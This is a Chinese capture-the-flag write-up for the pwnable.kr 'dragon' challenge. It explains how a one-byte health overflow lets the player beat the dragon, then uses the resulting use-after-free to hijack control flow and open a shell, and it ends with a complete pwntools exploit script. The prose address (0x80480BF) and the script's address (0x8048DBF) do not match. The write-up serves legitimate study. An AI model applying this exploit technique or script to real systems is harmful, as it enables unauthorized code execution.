dragon pwnable.kr writeup
2019-08-15 20:52:34 Author: bbs.pediy.com(查看原文) 阅读量:167 收藏

[原创] dragon pwnable.kr writeup

2019-8-6 23:15 489

[原创] dragon pwnable.kr writeup

http://pwnable.kr/play.php 中的 dragon

  • 首先分析题目逻辑

main() -> playgame():选择人物角色 -> fightdragon():与生成的龙角色进行回合制战斗

好,进入游戏。。。。
10分钟过去了。。。。

当我们分析正常逻辑,在游戏中人类永远无法赢得过龙。
但是看到在FightDragon函数中,对mama dragon初始化代码。

mama dragon 的血量表示只占一个字节。
一个字节能表示的最大血量是 127。

代码逻辑中当血量小于0时,判定我们胜利。

并且 free(dragon)。
所以我们可以选择角色 Priest 与 MamaDragon 进行战斗,防守(选项3)两次,然后(选项2)进行回复体力。
这样 3 4 个回合之后,每3个回合,mamaDragon血量增加12,初始是80,3 4个回合之后 80+48 = 128 > 127。
所以 3 * 4 个回合之后,血量为负值。

赢了之后的代码,

因为赢了之后会 free(dragon)。 在这又分配dragon相同大小内存,然后标准输入填充内容, 调用dragon 的首4byte指向的函数。
因此,到这里会触发 use after free 漏洞,而我们只需要将前4个字节填写为其他指令地址,就可以进行控制流劫持。

经过查找,我们发现

该地址处调用了system("/bin/sh")。
好了,那我们将输入前4个字节填充成 0x80480BF 就可以获得shell 。

from pwn import *

context.log_level = "DEBUG"

#p = process("./dragon")
p = connect("pwnable.kr",9004)
#priest with baby dragon 
p.sendline("1")
p.sendline("1")
p.sendline("1")

#priest with mama dragon 
p.sendline("1")

for i in range(4):
    p.sendline("3")
    p.sendline("3")
    p.sendline("2")


#send name to freed dragon heap chunk, first 32bit is the function called.

name = ""
name += p32(0x8048DBF)

p.sendline(name)

p.interactive()

[招聘]欢迎市场人员加入看雪学院团队!

最后于 2019-8-7 23:05 被mb_adqwxbvm编辑 ,原因: 上传图片


文章来源: https://bbs.pediy.com/thread-253644.htm
如有侵权请联系:admin#unsafe.sh